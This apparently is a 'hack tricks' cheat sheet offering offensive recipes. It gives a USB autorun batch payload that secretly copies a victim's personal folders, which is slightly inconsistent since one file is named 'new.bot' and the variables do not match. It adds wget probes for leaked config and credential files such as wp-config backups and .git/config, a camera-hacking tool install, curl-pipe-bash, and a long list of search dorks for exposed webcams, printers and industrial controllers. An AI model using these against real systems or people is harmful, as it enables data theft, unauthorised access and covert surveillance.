HACK TRICKS
USB HACK TRICK
Step 1: Open new Notepad File and type code given below and save as autorun.inf
[autorun]
open=new.bat
icon=new.bat,0
Step 2: Open another new Notepad File and type code given below and save as new.bot
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y /g
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
%backupcmd% "%USERPROFILE%\Download" "%drive%\all\Download"
%backupcmd% "%USERPROFILE%\Desktop" "%drive%\all\Desktop"
%backupcmd% "%USERPROFILE%\Music" "%drive%\all\Music"
%backupcmd% "%USERPROFILE%\Documents" "%drive%\all\Documents"
@echo off
Step 3: Paste both files new.bat & autorun.inf in your USB Drive
Step 4: Insert the USB drive into victims computer. Once you insert it, you will get all the data from victims computer. If it doesn’t work, simply open the Pendrive and double click on new.bat, the data will copies successfully.
Subdomain Hack trick perl script code
USE Example
copy the code save like Subdomain.pl
root@kali:~# perl Subdomain.pl <target> | more
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
my $domain = shift or die "Usage: $0 domain.com\n";
my $ua = LWP::UserAgent->new;
my $response = $ua->get("http://api.hackertarget.com/hostsearch/?q=$domain");
if ($response->is_success) {
my $result = $response->decoded_content;
print "$result\n";
} else {
die $response->status_line;
}
WEB BROWSER HACK TRICKS
Extensions, and technical hacks are presented for you to explore.
Example chrome://chrome-urls/ open in Web browser Chrome
Example about:about open in Web browser Firefox
CAM HACK TRICKS
root@kali:~# apt install git python3
root@kali:~# git clone https://github.com/AngelSecurityTeam/Cam-Hackers
root@kali:~# cd Cam-Hackers
root@kali:~/Cam-Hackers# pip install -r requirements.txt
root@kali:~/Cam-Hackers# python3 cam-hackers.py
Zaproxy trick
root@kali:~# apt install zaproxy tor
root@kali:~# service tor start
root@kali:~# proxychains owasp-zap -addoninstallall -quickurl <target>
Phoneinfoga install
root@kali:~# curl -sSL https://raw.githubusercontent.com/sundowndev/PhoneInfoga/master/support/scripts/install | bash
root@kali:~# sudo mv ./phoneinfoga /usr/bin/phoneinfoga
root@kali:~# phoneinfoga serve
Open http://127.0.0.1:5000/
Install Spiderfoot
root@kali:~# apt install spiderfoot
This package contains an open source intelligence (OSINT) automation tool. Its goal is to automate the process of gathering intelligence about a given target, which may be an IP address, domain name, hostname, network subnet, ASN, e-mail address or person’s name.
SpiderFoot can be used offensively, i.e. as part of a black-box penetration test to gather information about the target, or defensively to identify what information you or your organisation are freely providing for attackers to use against you.
Spiderfoot Example
root@kali:~# spiderfoot -l 127.0.0.1:5001
Spiderfoot Example TOR
root@kali:~# tor --SocksPort 9050 --ControlPort 9051
Hacking with wget Use usb key
root@kali:~#wget http://website/server-status
root@kali:~#wget http://website/sftp-config.json
root@kali:~#wget http://website/app/etc/local.xml
root@kali:~#wget http://website/.git/config
root@kali:~#wget http://website/.wp-config.php.swp
root@kali:~#wget http://website/%23wp-config.php%23
root@kali:~#wget http://website/wp-config.php~
root@kali:~#wget http://website/dump.sql
root@kali:~#wget -dnv http://website/sitemap.xml
root@kali:~#wget --random-wait -r -p -e robots=off -U mozilla http://website/
root@kali:~#wget --spider -o wget.log -e robots=off --wait 1 -r -p http://website
root@kali:~#wget -b -c --tries=NUMBER http://website
root@kali:~#wget -b --limit-rate=30 -np -N -m -nd --accept=LIST --wait=5 http://website/
root@kali:~#wget -r -H --convert-links --level=NUMBER --user-agent=AGENT http://website/
root@kali:~#wget --http-user=USER --http-password=PASS http://website/
First, create a text file of all the URLs you want to download using wget and call it wget_downloads.txt. Then to download URLs in bulk, type in this command
root@kali:~#wget -rH -p -dnv -i wget_downloads.txt
root@kali:~#wget -E -rH -p --no-check-certificate -i -dnv http://website/
root@kali:~#wget http://192.168.1.99//proc/kcore | struny | nano
🌎
inurl:login.html intitle:"GPON Home Gateway"
inurl:"portal.mwsl" "Status"
intitle:"D-LINK SYSTEMS, INC. | Web File Access : Login"
"Account" "Password" "All rights reserved" intitle:"HG8245"
intitle:"IP Webcam" inurl:"/greet.html"
inurl:login.html intitle:"Archer C7"
inurl:dtm.html intitle:1747-L551
site:*/dyn_sensors.htm "ID"
inurl:/Jview "zoom"
AXIS Camera exploit
intitle:"NetCamSC*"
"System" + "Toner" + "Input Tray" + "Output Tray" inurl:cgi
intitle:"NetCamXL*"
intitle:"Agent web client: Phone Login"
inurl:/Jview.htm + intext:"Zoom :"
intext:"Connection" AND "Network name" AND " Cisco Meraki cloud" AND "Security Appliance details"
"change the Administrator Password." intitle:"HP LaserJet" -pdf
inurl: inurl:"view.shtml" ext:shtml
inurl:"view.shtml" "camera"
inurl:"/cgi-bin/guestimage.html" "Menu"
inurl:"view.shtml" "Network"
inurl:/Jview.htm + "View Video - Java Mode"
inurl:/homej.html?
inurl: 1051/viewer/live/index.html?lang=en
inurl:/index.html?size=2&mode=4
intitle:"NetCamSC*" | intitle:"NetCamXL*" inurl:index.html
inurl:set_config_password.html
inurl:/8080 "windows" "live view"
inurl:"webArch/mainFrame.cgi" + "Web Image Monitor"
"Pop-up" + "Live Image" inurl:index.html
inurl:"live/cam.html"
inurl:"/viewer/live.html"
inurl:/CgiStart?page
inurl:"/viewer/live/index.html"
intitle:"Rockwell Automation" inurl:"index.html" "Device Name"
inurl:8080/view/viewer_index.shtml?id= -site:*.com
intitle:"Miniweb Start Page"
inurl:/presentation/html/top/index.html
allintitle:"Welcome to the Web-Based Configurator"
inurl:"view.shtml" "Network Camera"
intitle:"Tuxedo Connected Controller"
inurl:/config/cam_portal.cgi "Panasonic"
inurl:.*eservices/login
"Camera Live Image" inurl:"guestimage.html"
intitle:"UPS Status" "Status" inurl:/host
intitle:"webcam" inurl:login
"HP LaserJet" inurl:"SSI/index.htm"
inurl:8081/ "Pan, Tilt & Zoom"
inurl:axis-cgi/mjpg/video swf
inurl:/home/homej.html
intext:"Frame rate" inurl:/home/homej.html
intext:"Device Name" | intext:"Host Name" inurl:mainFrame.cgi
inurl:"/general/status.html"
inurl:axis-cgi/jpg
inurl:/ViewerFrame? intitle:"Network Camera NetworkCamera"
inurl /view.shtml intext:"Airport"
intitle:"SFXAdmin - sfx_global" intext:"Login Form"
inurl:/sws/index.html
inurl:/jobq.htm AND intext:"ApeosPort-V"
inurl:/base/main_login.html intext:"Login"
inurl:index.shtml
allinurl:top.htm?Currenttime
intitle:"HP ALM" "Application Lifecycle Management" inurl:/qcbin/ -ext:PDF
intitle:"WEBCAM 7 " -inurl:/admin.html
site:*/EWS/Exchange.asmx
inurl:/db.php?path_local=
inurl:/gmap.php?id=
intitle:"WeatherLinkIP Configuration"
intitle:"Internet Services" inurl:default.htm intext:"FUJI XEROX"
intitle:"Kyocera Command Center" inurl:index.htm
inurl:8080/dashboard.php
inurl:8080/dashboard intitle:Graphite Dashboard
inurl:/index.htm intext:"Oki Data Corporation"
inurl:mainFrame.cgi intext:"RICOH"
inurl:/?MAIN=DEVICE intitle:TopAccess intext:Device
inurl:/main.html intext:SHARP AND intext:MX-*
inurl:sws/index.html AND intext:"Model Name" AND intext:"Serial Number"
inurl:/dana/home/ filetype:cgi
inurl:/dana-cached/sc/
intitle:"index of" "cvsweb.cgi"
inurl:SSI/index.htm
inurl:./sws/index.sws
inurl:/frameprop.htm
inurl:"/English/pages_WinUS/" AND intitle:"Top page"
intitle:"Printer Status" AND inurl:"/PrinterStatus.html"
intitle:("Solr Admin") AND intext:("Dashboard" AND "Corporation")
inurl:axis-cgi/mjpg/video.cgi
inurl:8000 intext:"Copyright CANON INC. 2012"
inurl:cgistart
inurl:view.shtml
intitle:NetworkCamera intext:"Pan / Tilt" inurl:ViewerFrame
inurl:/live.htm intext:"M-JPEG"|"System Log"|"Camera-1"|"View Control"
intitle:("Solr admin page") AND intext:("Make a Query")
inurl:/HDDReplay.html
intitle:"webcamXP 5" inurl:8080 'Live'
intext:"EWS Data Collection and Use"
inurl:hp/device/deviceinformation
intitle:ThingsBoard inurl:8080/dashboard
filetype:psp intitle:"Motorola - FX9500"
inurl:"view/index.shtml"
inurl:"MultiCameraFrame?Mode=Motion"
"VB Viewer" inurl:/viewer/live/ja/live.html
intitle:"IP CAMERA Viewer" intext:"setting | Client setting"
inurl:"nobody/loginQuick.htm"
site:*/cgi-bin/webproc intext:"username"
inurl:/swagger/index.html
intext:"Security is Off" intitle:"Namenode information"
"Firmware Version" intitle:"iLO" ProLiant Login -hpe.com -update
intitle:rsview32 ext:asp
intitle:"WSO2 Management Console"
intitle:"Home - Mongo Express"
inurl:"8080/dashboard/" intitle:"Dashboard"
inurl:"/index.php?enter=guest"
inurl:CGI/Java/Serviceability?adapter=device.statistics.device
intitle:"Marshall VS Server"
intext:{{szErrorTip}} inurl:/doc/page/login.asp
intitle:"openshift web console" inurl:console inurl:/console
inurl:"/hp_login.html"
inurl:webArch/mainFrame filetype:cgi intext:"Web Image Monitor"
intitle:"VideoEdge Admin Interface"